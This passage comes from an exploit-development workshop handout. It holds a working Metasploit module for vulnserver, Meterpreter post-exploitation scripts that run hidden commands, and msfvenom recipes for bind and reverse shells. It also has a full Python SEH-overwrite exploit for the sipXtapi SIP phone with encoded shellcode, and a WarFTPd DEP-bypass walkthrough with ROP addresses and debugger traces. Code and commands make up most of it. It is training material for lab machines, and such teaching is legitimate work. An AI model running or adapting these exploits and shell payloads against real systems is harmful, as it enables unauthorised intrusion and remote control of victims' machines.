  1015. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  1016.  
  1017. ------------------------------
  1018.  
  1019.  
  1020.  
  1021.  
  1022.  
  1023.  
  1024.  
  1025.  
  1026. -----From your Linux attack host that can reach your Windows machine that is running vulnerver.exe------
  1027.  
  1028.  
  1029.  
  1030.  
  1031. ---------------------------Type This-----------------------------------
  1032.  
  1033. cd /usr/share/metasploit-framework/modules/exploits/windows/misc
  1034.  
  1035. nano vulnserv.rb
  1036. -------(paste the code below into this file)-------
  1037. #
  1038. #
  1039. # Quick Metasploit exploit for vulnserver.exe
  1040. # Written by: Joe McCray
  1041. # Email: joe@strategicsec.com
  1042. #
  1043. # Place this exploit in:
  1044. # /usr/share/metasploit-framework/modules/exploits/windows/misc
  1045. #
  1046. require 'msf/core'
  1047.  
  1048. class Metasploit3 < Msf::Exploit::Remote
  1049. include Msf::Exploit::Remote::Tcp
  1050. def initialize(info = {})
  1051. super(update_info(info,
  1052. 'Name' => 'Custom vulnerable server stack overflow',
  1053. 'Description' => %q{
  1054. This module exploits a stack overflow in an app called
  1055. vulnserver that is designed to teach simple exploitation.
  1056. },
  1057. 'Author' => [ 'Joe McCray' ],
  1058. 'DefaultOptions' =>
  1059. {
  1060. 'EXITFUNC' => 'process',
  1061. },
  1062. 'Payload' =>
  1063. {
  1064. 'Space' => 800,
  1065. 'BadChars' => "\x00\x20",
  1066. },
  1067. 'Platform' => 'win',
  1068.  
  1069. 'Targets' =>
  1070. [
  1071. [
  1072. 'Windows XP SP3 EN',
  1073. {
  1074. 'Ret' => 0x625011AF,
  1075. }
  1076. ],
  1077. ],
  1078. 'DefaultTarget' => 0,
  1079.  
  1080. 'Privileged' => false
  1081. ))
  1082.  
  1083. register_options(
  1084. [
  1085. Opt::RPORT(9999)
  1086. ], self.class)
  1087. end
  1088.  
  1089. def exploit
  1090. connect
  1091. sock.recv(1024)
  1092.  
  1093. p = "\x41" * 16
  1094. p << payload.encoded
  1095.  
  1096. hdr = "TRUN ."
  1097. boom = pattern_create(3000)
  1098. boom[2006, 4] = [target.ret].pack('V') # EIP value
  1099. boom[2010, p.length] = p
  1100.  
  1101. sploit = hdr + boom
  1102.  
  1103. sock.put(sploit)
  1104.  
  1105. handler
  1106. disconnect
  1107.  
  1108. end
  1109.  
  1110. end
  1111. ------------------end of copy/paste content --------------
  1112.  
  1113.  
  1114.  
  1115. ---------------------------Type This-----------------------------------
  1116. msfconsole
  1117.  
  1118.  
  1119.  
  1120. use exploit/windows/misc/vulnserv
  1121. set PAYLOAD windows/meterpreter/bind_tcp
  1122. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  1123. set RPORT 9999
  1124. exploit
  1125. ----------------------------------------------------------------------
  1126.  
  1127.  
  1128. ################################
  1129. # Custom Meterpreter Scripting #
  1130. ################################
  1131.  
  1132. - In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
  1133. can offer. This will also show you the flexibility of the Meterpreter scripts.
  1134.  
  1135. - We're going to start off with a simple Hello World script first.
  1136.  
  1137. ---------------------------Type This-----------------------------------
  1138. echo 'print_status("Hello World")' > /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  1139. -----------------------------------------------------------------------
  1140.  
  1141. - This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
  1142.  
  1143. - Lets test out our helloworld.rb Meterpreter script.
  1144.  
  1145. ---------------------------Type This-----------------------------------
  1146. meterpreter> run helloworld
  1147. -----------------------------------------------------------------------
  1148.  
  1149. - So far so good, now we can build on this base. Lets add a couple more API calls to the script.
  1150.  
  1151. - Open /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb in your favorite editor and add following
  1152.  
  1153. line.
  1154. ---------------------------Type This-----------------------------------
  1155. vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  1156. -----------------------------------------------------------------------
  1157.  
  1158. ---------------------------Paste This-----------------------------------
  1159. print_error("this is an error!")
  1160. print_line("this is a line")
  1161. -----------------------------------------------------------------------
  1162.  
  1163.  
  1164. - Now run the script:
  1165.  
  1166. meterpreter> run helloworld
  1167.  
  1168.  
  1169. - Now that we have the basics down, we're going to do something a little more exciting.
  1170. - The architecture to follow when creating these scripts goes as follows:
  1171.  
  1172. def getinfo(session)
  1173. begin
  1174. <stuff goes here>
  1175. rescue ::Exception => e
  1176. <stuff goes here>
  1177. end
  1178. end
  1179.  
  1180. -----------------------------------------------------------------------
  1181. - Copy and paste the following code into our helloworld.rb script:
  1182. ---------------------------Paste This-----------------------------------
  1183. def getinfo(session)
  1184. begin
  1185. sysnfo = session.sys.config.sysinfo
  1186. runpriv = session.sys.config.getuid
  1187. print_status("Getting system information ...")
  1188. print_status("The target machine OS is #{sysnfo['OS']}")
  1189. print_status("The computer name is #{'Computer'} ")
  1190. print_status("Script running as #{runpriv}")
  1191. rescue ::Exception => e
  1192. print_error("The following error was encountered #{e}")
  1193. end
  1194. end
  1195.  
  1196. getinfo(client)
  1197. --------------------------------------------------------------------------
  1198.  
  1199.  
  1200. - Now run the script:
  1201. ---------------------------Type This-----------------------------------
  1202. meterpreter> run helloworld
  1203. -----------------------------------------------------------------------
  1204.  
  1205. - We can expand it by adding actual system commands to the script, lets look at how we can do this.
  1206.  
  1207. ---------------------------Paste This-----------------------------------
  1208. def list_exec(session,cmdlst)
  1209. print_status("Running Command List ...")
  1210. r=''
  1211. session.response_timeout=120
  1212. cmdlst.each do |cmd|
  1213. begin
  1214. print_status "running command #{cmd}"
  1215. r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
  1216. while(d = r.channel.read)
  1217.  
  1218. print_status("#{d}")
  1219. end
  1220. r.channel.close
  1221. r.close
  1222. rescue ::Exception => e
  1223. print_error("Error Running Command #{cmd}: #{e.class} #{e}")
  1224. end
  1225. end
  1226. end
  1227.  
  1228. commands = [ "set",
  1229. "ipconfig /all",
  1230. "arp -a"]
  1231.  
  1232. list_exec(client,commands)
  1233. ------------------------------------------------------------------------
  1234.  
  1235.  
  1236. - Run the script:
  1237. ---------------------------Type This-----------------------------------
  1238. meterpreter> run helloworld
  1239. -----------------------------------------------------------------------
  1240.  
  1241. Note: Add all of the commands from the script below to your helloworld.rb script:
  1242. https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
  1243.  
  1244.  
  1245.  
  1246.  
  1247. -----------------------------------------------------------------------
  1248. ###############
  1249. # Challenge 1 #
  1250. ###############
  1251. The exploits listed below are all simple stack overflows with the vulnerable application being available for download.
  1252. • http://www.exploit-db.com/exploits/17550/
  1253. • http://www.exploit-db.com/exploits/19266/
  1254. • http://www.exploit-db.com/exploits/18382/
  1255. • http://www.exploit-db.com/exploits/17527/
  1256. • http://www.exploit-db.com/exploits/15238/
  1257. • http://www.exploit-db.com/exploits/15231/
  1258. • http://www.exploit-db.com/exploits/14623/
  1259. • http://www.exploit-db.com/exploits/12152/
  1260. • http://www.exploit-db.com/exploits/11328/
  1261.  
  1262. Your challenge is to choose one of the exploits above, verify that it works on your target Windows host (if not why does it not work). Then re-write the script in the multiscript skeleton format like we did for the vulnserver and freefloat FTP exploits (meaning no less than 7 scripts).
  1263.  
  1264.  
  1265.  
  1266. ###############
  1267. # Challenge 2 #
  1268. ###############
  1269. Here is my SEH Overwrite walk-through script. See if it helps you with going through the challenge below.
  1270. http://45.63.104.73/SEH-Overwrite.zip
  1271.  
  1272. #######
  1273. # SEH #
  1274. #######
  1275.  
  1276. sipex0.py
  1277. ---------
  1278. 1. What are """ used for in Python
  1279. 2. How many bytes of data is being sent to the tag variable?
  1280. 3. How many bytes of data is being sent to the cseq variable?
  1281.  
  1282.  
  1283. sipex1.py
  1284. ---------
  1285. 1. What is sys.stderr.write?
  1286. 2. What is happening in line 29?
  1287. 3. What is happening in line 31?
  1288.  
  1289.  
  1290.  
  1291. sipex2.py
  1292. ---------
  1293. 1. What is happening in line 17?
  1294. 2. What is happening in line 18?
  1295. 3. What is the difference between read(), readline(), and readlines() in Python?
  1296.  
  1297.  
  1298.  
  1299. sipex3.py
  1300. ---------
  1301. 1. What is structured exception handler?
  1302. 2. what is happening in line 20?
  1303. 3. What is happening in line 21?
  1304. 4. What is happening in line 23?
  1305.  
  1306.  
  1307. sipex4.py
  1308. ---------
  1309. 1. What is happening in line 20?
  1310. 2. what is happening in line 21?
  1311. 3. What is happening in line 23?
  1312. 4. What is happening in line 25?
  1313. 5. What is happening in line 26?
  1314.  
  1315.  
  1316.  
  1317.  
  1318.  
  1319.  
  1320. The exploits listed below are all simple SEH overwrites with the vulnerable application being available for download.
  1321. SEH Overwrites:
  1322. • http://www.exploit-db.com/exploits/19625/
  1323. • http://www.exploit-db.com/exploits/17361/
  1324. • http://www.exploit-db.com/exploits/16101/
  1325. • http://www.exploit-db.com/exploits/15834/
  1326. • http://www.exploit-db.com/exploits/14195/
  1327. • http://www.exploit-db.com/exploits/11179/
  1328. • http://www.exploit-db.com/exploits/10973/
  1329. • http://www.exploit-db.com/exploits/10765/
  1330. • http://www.exploit-db.com/exploits/9596/
  1331. • http://www.exploit-db.com/exploits/8142/
  1332.  
  1333. Your challenge is to choose one of the exploits above, verify that it works on your target Windows host (if not why does it not work). Then re-write the script in the multiscript skeleton format like we did for the vulnserver and freefloat FTP exploits (meaning no less than 7 scripts).
  1334.  
  1335.  
  1336.  
  1337. ##################
  1338. # SEH Overwrites #
  1339. ##################
  1340.  
  1341. #################################################
  1342. # On our VictimXP Host (192.168.4.50) #
  1343. # Start sipXexPhone if it isn’t already running #
  1344. # Start WinDBG #
  1345. # Press “F6” and Attach to sipXexPhone.exe #
  1346. # Press “F5” to start the debugger #
  1347. #################################################
  1348.  
  1349.  
  1350.  
  1351.  
  1352.  
  1353. python sipex0.py 192.168.4.50
  1354. 0:003> dd eip
  1355. 0:003> dd esp
  1356. 0:003> !exchain
  1357. 0:003> dds esp
  1358. 0:003> dds
  1359.  
  1360. python sipex1.py 192.168.4.50
  1361. 0:003> dd eip
  1362. 0:003> dd esp
  1363. 0:003> !exchain
  1364. 0:003> g
  1365.  
  1366. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  1367.  
  1368.  
  1369. python sipex2.py 192.168.4.50
  1370. 0:003> dd eip
  1371. 0:003> dd esp
  1372. 0:003> !exchain
  1373. 0:003> g
  1374.  
  1375.  
  1376. ***ssh into 192.168.4.81 user: strategicsec pass: strategicsec***
  1377. cd ~/toolz/metasploit/tools/exploit
  1378. ruby pattern_offset.rb 41346941 We should see that SEH is at 252
  1379.  
  1380.  
  1381.  
  1382. !load narly
  1383. !nmod
  1384.  
  1385. ***ssh into 192.168.4.81 user: strategicsec pass: strategicsec***
  1386. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  1387. cd /home/strategicsec/toolz/metasploit/
  1388. ./msfbinscan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  1389.  
  1390.  
  1391. #########################################
  1392. # sipex3.py in Notepad++. #
  1393. # Set cseq = 252 #
  1394. # Set seh2 address to: 0x10015977 #
  1395. #########################################
  1396.  
  1397.  
  1398. python sipex3.py 192.168.4.50
  1399. 0:003> !exchain
  1400.  
  1401. python sipex4.py 192.168.4.50
  1402.  
  1403.  
  1404. nc 192.168.4.50 4444
  1405.  
  1406.  
  1407. -----------------------------------------------
  1408. Here is some quick syntax you can use for generating payloads:
  1409.  
  1410.  
  1411. Calc:
  1412. -----
  1413. msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
  1414.  
  1415.  
  1416. Bind Shell
  1417. ----------
  1418. msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00\x0A\x0D' -f python
  1419.  
  1420.  
  1421. Reverse Shell
  1422. -------------
  1423. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f python
  1424.  
  1425.  
  1426. Javascript Payload:
  1427. -------------------
  1428. msfvenom -p windows/exec CMD=calc.exe -f js_le -e generic/none
  1429. msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -f js_le -e generic/none
  1430. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -f js_le -e generic/none
  1431.  
  1432. --------------------------------------------------------------------------------------
  1433. #!/usr/bin/python2
  1434. # Remote Buffer Overflow in sipXtapi
  1435.  
  1436. import sys
  1437. import socket
  1438. import struct # for pack function
  1439.  
  1440. if len(sys.argv) < 2:
  1441. sys.stderr.write("Usage: sipex.py <host>\n")
  1442. sys.exit(1)
  1443.  
  1444. target = sys.argv[1]
  1445. tag = "\x42" * 20
  1446. source = "127.0.0.1"
  1447. target_port = 5060
  1448. user = "bad"
  1449.  
  1450. cseq = "A" * 252 # Replace with distance to SEH
  1451.  
  1452. seh1 = "\x90\x90\xEB\x04" # nop, nop, jmp+4
  1453. seh2 = struct.pack('<I', 0x10015977) # replace this with a pop/pop/ret addr
  1454.  
  1455. # Replace 0x42424242 with POP/POP/RET value 0x10015977 from ./msfbinscan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  1456.  
  1457. # shellcode = "\xCC" * 300 # int 3 shellcode
  1458.  
  1459. shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  1460. shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x48\x6a\x67"
  1461. shellcode += "\x58\x50\x30\x41\x31\x41\x42\x6b\x41\x41\x77\x32\x41\x42\x41\x32"
  1462. shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x39\x6c\x41"
  1463. shellcode += "\x7a\x7a\x4b\x30\x4d\x6b\x58\x6b\x49\x6b\x4f\x59\x6f\x4b\x4f\x65"
  1464. shellcode += "\x30\x4e\x6b\x62\x4c\x57\x54\x51\x34\x6c\x4b\x31\x55\x45\x6c\x6c"
  1465. shellcode += "\x4b\x51\x6c\x47\x75\x33\x48\x63\x31\x6a\x4f\x6c\x4b\x52\x6f\x56"
  1466. shellcode += "\x78\x4e\x6b\x63\x6f\x61\x30\x64\x41\x6a\x4b\x53\x79\x4e\x6b\x35"
  1467. shellcode += "\x64\x4e\x6b\x73\x31\x7a\x4e\x46\x51\x59\x50\x4d\x49\x4e\x4c\x4b"
  1468. shellcode += "\x34\x59\x50\x53\x44\x34\x47\x4b\x71\x5a\x6a\x34\x4d\x37\x71\x79"
  1469. shellcode += "\x52\x5a\x4b\x4b\x44\x57\x4b\x70\x54\x57\x54\x65\x78\x73\x45\x6b"
  1470. shellcode += "\x55\x4e\x6b\x51\x4f\x45\x74\x47\x71\x7a\x4b\x30\x66\x4c\x4b\x54"
  1471. shellcode += "\x4c\x32\x6b\x6e\x6b\x41\x4f\x35\x4c\x54\x41\x6a\x4b\x53\x33\x56"
  1472. shellcode += "\x4c\x4e\x6b\x4b\x39\x62\x4c\x47\x54\x77\x6c\x52\x41\x4b\x73\x75"
  1473. shellcode += "\x61\x59\x4b\x53\x54\x6e\x6b\x43\x73\x70\x30\x4c\x4b\x51\x50\x56"
  1474. shellcode += "\x6c\x4e\x6b\x44\x30\x77\x6c\x4c\x6d\x4c\x4b\x43\x70\x35\x58\x31"
  1475. shellcode += "\x4e\x72\x48\x4e\x6e\x42\x6e\x76\x6e\x6a\x4c\x76\x30\x4b\x4f\x6b"
  1476. shellcode += "\x66\x42\x46\x62\x73\x52\x46\x73\x58\x65\x63\x30\x32\x41\x78\x72"
  1477. shellcode += "\x57\x33\x43\x47\x42\x31\x4f\x71\x44\x49\x6f\x7a\x70\x55\x38\x78"
  1478. shellcode += "\x4b\x78\x6d\x4b\x4c\x77\x4b\x50\x50\x6b\x4f\x4b\x66\x43\x6f\x6d"
  1479. shellcode += "\x59\x4b\x55\x50\x66\x6d\x51\x38\x6d\x43\x38\x57\x72\x42\x75\x71"
  1480. shellcode += "\x7a\x63\x32\x39\x6f\x4e\x30\x55\x38\x79\x49\x45\x59\x38\x75\x4e"
  1481. shellcode += "\x4d\x61\x47\x6b\x4f\x6a\x76\x73\x63\x70\x53\x66\x33\x43\x63\x36"
  1482. shellcode += "\x33\x41\x53\x71\x43\x70\x43\x43\x63\x4b\x4f\x5a\x70\x30\x66\x50"
  1483. shellcode += "\x68\x75\x41\x71\x4c\x50\x66\x42\x73\x4c\x49\x6d\x31\x7a\x35\x30"
  1484. shellcode += "\x68\x6e\x44\x34\x5a\x50\x70\x38\x47\x52\x77\x6b\x4f\x4e\x36\x70"
  1485. shellcode += "\x6a\x74\x50\x51\x41\x43\x65\x4b\x4f\x38\x50\x63\x58\x6d\x74\x6e"
  1486. shellcode += "\x4d\x56\x4e\x5a\x49\x31\x47\x69\x6f\x4a\x76\x53\x63\x30\x55\x4b"
  1487. shellcode += "\x4f\x6e\x30\x41\x78\x6a\x45\x37\x39\x4f\x76\x41\x59\x61\x47\x69"
  1488. shellcode += "\x6f\x48\x56\x46\x30\x70\x54\x73\x64\x73\x65\x39\x6f\x6e\x30\x4e"
  1489. shellcode += "\x73\x45\x38\x5a\x47\x33\x49\x6f\x36\x54\x39\x66\x37\x4b\x4f\x6b"
  1490. shellcode += "\x66\x42\x75\x4b\x4f\x58\x50\x61\x76\x33\x5a\x30\x64\x50\x66\x30"
  1491. shellcode += "\x68\x72\x43\x42\x4d\x4b\x39\x4b\x55\x63\x5a\x52\x70\x50\x59\x31"
  1492. shellcode += "\x39\x38\x4c\x6c\x49\x39\x77\x70\x6a\x52\x64\x4c\x49\x68\x62\x50"
  1493. shellcode += "\x31\x6f\x30\x4b\x43\x6f\x5a\x49\x6e\x50\x42\x46\x4d\x59\x6e\x50"
  1494. shellcode += "\x42\x44\x6c\x6d\x43\x4c\x4d\x33\x4a\x77\x48\x4c\x6b\x4e\x4b\x4c"
  1495. shellcode += "\x6b\x70\x68\x31\x62\x6b\x4e\x6d\x63\x72\x36\x6b\x4f\x70\x75\x30"
  1496. shellcode += "\x44\x39\x6f\x78\x56\x33\x6b\x52\x77\x51\x42\x73\x61\x62\x71\x50"
  1497. shellcode += "\x51\x33\x5a\x44\x41\x50\x51\x50\x51\x62\x75\x30\x51\x59\x6f\x78"
  1498. shellcode += "\x50\x70\x68\x6e\x4d\x4b\x69\x76\x65\x68\x4e\x50\x53\x6b\x4f\x39"
  1499. shellcode += "\x46\x33\x5a\x59\x6f\x4b\x4f\x34\x77\x4b\x4f\x78\x50\x4c\x4b\x51"
  1500. shellcode += "\x47\x6b\x4c\x6b\x33\x4b\x74\x45\x34\x6b\x4f\x4a\x76\x36\x32\x4b"
  1501. shellcode += "\x4f\x38\x50\x50\x68\x58\x70\x6d\x5a\x43\x34\x33\x6f\x66\x33\x79"
  1502. shellcode += "\x6f\x6e\x36\x4b\x4f\x4a\x70\x67"
  1503.  
  1504.  
  1505. cseq = cseq + seh1 + seh2 + shellcode
  1506.  
  1507. packet = """INVITE sip:user@{source} SIP/2.0\r
  1508. To: <sip:{target}:{target_port}>\r
  1509. Via: SIP/2.0/UDP {target}:3277\r
  1510. From: "PRANKCALLER" <sip:{target}:3277>;tag={tag}\r
  1511. Call-ID: 3121{target}\r
  1512. CSeq: {cseq}\r
  1513. Max-Forwards: 70\r
  1514. Contact: <sip:{source}:5059>\r
  1515. \r
  1516. """.format(source=source, target=target, target_port=target_port, tag=tag, cseq=cseq)
  1517.  
  1518. sys.stderr.write("Packet\n"+packet+"\n")
  1519.  
  1520. sys.stderr.write("Sending Packet to: " + target + "\n\n")
  1521.  
  1522. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  1523.  
  1524. try:
  1525. sock.connect((target, target_port))
  1526. sock.sendall(packet + "\n")
  1527. except Exception as e:
  1528. sys.stderr.write("Cannot send to "+str(target)+" : "+str(target_port)+" : "+str(e)+"!\n")
  1529. finally:
  1530. sock.close()
  1531. sys.stderr.write("Sent.\n")
  1532.  
  1533.  
  1534.  
  1535. ---------------------------------------------------------------------------------------------
  1536.  
  1537. ###################################
  1538. # Stack Overflows with DEP Bypass #
  1539. ###################################
  1540.  
  1541. Reboot your target host and choose the "2nd" option for DEP.
  1542.  
  1543.  
  1544. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b
  1545.  
  1546.  
  1547.  
  1548. python warftpd1.py | nc XPSP3-ED-Target-IP 21
  1549.  
  1550. At WINDBG prompt
  1551. “r” to show registers or “alt+4”
  1552.  
  1553. dd esp
  1554.  
  1555.  
  1556.  
  1557.  
  1558. python warftpd2.py | nc XPSP3-ED-Target-IP 21
  1559.  
  1560.  
  1561. At WINDBG prompt
  1562. “r” to show registers or “alt+4”
  1563. dd esp
  1564.  
  1565. Eip: 32714131
  1566. esp: affd58 (71413471)
  1567.  
  1568. Now we need to SSH into the StrategicSec Ubuntu host
  1569.  
  1570. cd /home/strategicsec/toolz/metasploit/tools
  1571.  
  1572. ruby pattern_offset.rb 32714131
  1573. 485
  1574.  
  1575. ruby pattern_offset.rb 71413471
  1576. 493
  1577.  
  1578.  
  1579.  
  1580.  
  1581.  
  1582.  
  1583.  
  1584.  
  1585. cd /home/strategicsec/toolz/metasploit/tools
  1586.  
  1587. ruby pattern_offset.rb 32714131
  1588.  
  1589. cd /home/strategicsec/toolz/metasploit/
  1590.  
  1591. ./msfbinscan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  1592.  
  1593.  
  1594.  
  1595. python warftpd3.py | nc XPSP3-ED-Target-IP 21
  1596.  
  1597. 0:003> dd eip
  1598. 0:003> dd esp
  1599.  
  1600. INT3s - GOOD!!!!!!!
  1601.  
  1602.  
  1603.  
  1604. python warftpd4.py | nc XPSP3-ED-Target-IP 21
  1605.  
  1606. nc XPSP3-ED-Target-IP 4444
  1607.  
  1608.  
  1609. strategicsec....exploit no workie!!!!
  1610.  
  1611.  
  1612. Why????????? DEP!!!!!!!!!!!!!
  1613.  
  1614.  
  1615.  
  1616.  
  1617. Let's look through ole32.dll for the following instructions:
  1618.  
  1619. mov al,0x1
  1620. ret 0x4
  1621.  
  1622. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1623.  
  1624.  
  1625.  
  1626. ./msfbinscan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  1627.  
  1628. [DLLs/xpsp3/ole32.dll]
  1629. 0x775ee00e b001c204
  1630. 0x775ee00e mov al, 1
  1631. 0x775ee010 ret 4
  1632.  
  1633.  
  1634. Then we need to jump to the LdrpCheckNXCompatibility routine in
  1635. ntdll.dll that disables DEP.
  1636.  
  1637.  
  1638.  
  1639. Inside of ntdll.dll we need to find the following instructions:
  1640.  
  1641. CMP AL,1
  1642. PUSH 2
  1643. POP ESI
  1644. JE ntdll.7
  1645.  
  1646.  
  1647.  
  1648. ./msfbinscan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  1649.  
  1650. [DLLs/xpsp3/ntdll.dll]
  1651. 0x7c91cd24 3c016a025e0f84
  1652. 0x7c91cd24 cmp al, 1
  1653. 0x7c91cd26 push 2
  1654. 0x7c91cd28 pop esi
  1655. 0x7c91cd29 jz 7
  1656.  
  1657.  
  1658. This set of instructions makes sure that AL is set to 1, 2 is pushed
  1659. on the stack then popped into ESI.
  1660.  
  1661.  
  1662.  
  1663.  
  1664.  
  1665. dep = "\x0e\xe0\x5e\x77"+\
  1666. "\xff\xff\xff\xff"+\
  1667. "\x24\xcd\x91\x7c"+\
  1668. "\xff\xff\xff\xff"+\
  1669. "A"*0x54
  1670.  
  1671.  
  1672.  
  1673. #################################
  1674. # Start WarFTPd #
  1675. # Start WinDBG #
  1676. # Press F6 #
  1677. # Attach to war-ftpd.exe #
  1678. # bp 0x775ee00e #
  1679. # g #
  1680. #################################
  1681.  
  1682.  
  1683.  
  1684.  
  1685. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  1686.  
  1687. ---------------------------------------------------------------------------
  1688. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1689.  
  1690. mov al,0x1
  1691. ret 0x4
  1692.  
  1693.  
  1694.  
  1695.  
  1696. 0:005> g
  1697. Breakpoint 0 hit
  1698. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1699. eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1700. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1701. ole32!CSSMappedStream::IsWriteable:
  1702. 775ee00e b001 mov al,1
  1703.  
  1704.  
  1705. 0:001> t
  1706. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1707. eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1708. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1709. ole32!CSSMappedStream::IsWriteable+0x2:
  1710. 775ee010 c20400 ret 4
  1711.  
  1712.  
  1713.  
  1714.  
  1715.  
  1716. ---------------------------------------------------------------------------
  1717. Ok, so inside of ntdll.dll we need to find the following instructions:
  1718.  
  1719. CMP AL,1
  1720. PUSH 2
  1721. POP ESI
  1722. JE ntdll.7
  1723.  
  1724. 0:001> t
  1725. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1726. eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
  1727. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  1728. ntdll!LdrpCheckNXCompatibility+0x13:
  1729. 7c91cd24 3c01 cmp al,1
  1730.  
  1731.  
  1732. 0:001> t
  1733. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1734. eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1735. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1736. ntdll!LdrpCheckNXCompatibility+0x15:
  1737. 7c91cd26 6a02 push 2
  1738.  
  1739.  
  1740. 0:001> t
  1741. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
  1742. eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1743. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1744. ntdll!LdrpCheckNXCompatibility+0x17:
  1745. 7c91cd28 5e pop esi
  1746.  
  1747.  
  1748. 0:001> t
  1749. eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
  1750. eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
  1751. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
  1752. ntdll!LdrpCheckNXCompatibility+0x18:
  1753. 7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
  1754.  
  1755.  
  1756. ---------------------------------------------------------------------------
  1757.  
  1758.  
  1759.  
  1760. python warftpd5.py | nc XPSP3-ED-Target-IP 21
  1761.  
  1762. nc XPSP3-ED-Target-IP 4444
  1763.  
  1764.  
  1765. ##################
  1766. # SEH Overwrites #
  1767. ##################
  1768.  
  1769. #################################################
  1770. # On our VictimXP Host (XPSP3-ED-Target-IP) #
  1771. # Start sipXexPhone if it isn’t already running #
  1772. # Start WinDBG #
  1773. # Press “F6” and Attach to sipXexPhone.exe #
  1774. # Press “F5” to start the debugger #
  1775. #################################################
  1776.  
  1777.  
  1778. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
  1779.  
  1780.  
  1781.  
  1782. python sipex0.py XPSP3-ED-Target-IP
  1783.  
  1784. 0:003> !exchain
  1785. 0:003> dds esp
  1786. 0:003> dds
  1787.  
  1788. python sipex1.py XPSP3-ED-Target-IP
  1789.  
  1790. 0:003> !exchain
  1791. 0:003> g
  1792.  
  1793. When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
  1794.  
  1795.  
  1796. python sipex2.py XPSP3-ED-Target-IP
  1797.  
  1798. 0:003> !exchain
  1799. 0:003> g
  1800.  
  1801.  
  1802. ***ssh into instructor Ubuntu host***
  1803. cd /home/strategicsec/toolz/metasploit/tools
  1804. ruby pattern_offset.rb 41346941 We should see that SEH is at 252
  1805.  
  1806.  
  1807.  
  1808. !load narly
  1809. !nmod
  1810.  
  1811. ***ssh into instructor Ubuntu host***
  1812. ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
  1813. cd /home/strategicsec/toolz/metasploit/
  1814. ./msfbinscan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
  1815.  
  1816.  
  1817. #########################################
  1818. # sipex3.py in Notepad++. #
  1819. # Set cseq = 252 #
  1820. # Set seh2 address to: 0x10015977 #
  1821. #########################################
  1822.  
  1823.  
  1824. python sipex3.py XPSP3-ED-Target-IP
  1825. 0:003> !exchain
  1826.  
  1827. python sipex4.py XPSP3-ED-Target-IP
  1828.  
  1829.  
  1830.  
  1831. nc XPSP3-ED-Target-IP 4444
  1832.  
  1833.  
  1834.  
  1835.  
  1836. ################################
  1837. # Not Enough Space (Egghunter) #
  1838. ################################
  1839.  
  1840.  
  1841.  
  1842. SWS - SIMPLE WEB SERVER
  1843. -----------------------
  1844.  
  1845. Running SWS on Strategicsec-XP-ED-Target-VM
  1846. Start > Programs > Simple Web Server (it's in the middle somewhere)
  1847. Red icon in system tray
  1848. Double click it
